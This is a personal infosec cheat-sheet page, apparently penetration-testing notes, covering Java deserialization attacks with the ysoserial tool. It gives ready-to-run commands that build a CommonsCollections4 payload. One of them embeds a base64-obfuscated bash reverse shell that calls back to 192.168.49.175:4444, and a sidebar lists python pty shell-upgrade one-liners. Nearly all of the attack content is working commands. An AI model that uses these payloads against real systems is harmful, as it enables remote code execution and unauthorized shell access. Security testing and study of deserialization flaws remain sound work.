akde/infosec

Information security is ultimately about managing risk

JAVA

,

If you can pro­vide a seri­al­ized (.ser) file, try to cre­ate a pay­load direct­ly, if you have the source code, or just use a yose­r­i­al payload.

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser
// Prepare a reverse shell command line an transform it into b64.
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > /tmp/recycler.ser

Notes

  • Dese­ri­al­iza­tion attack tool
  • https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
  • See also https://book.hacktricks.xyz/pentesting-web/deserialization#java-http

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';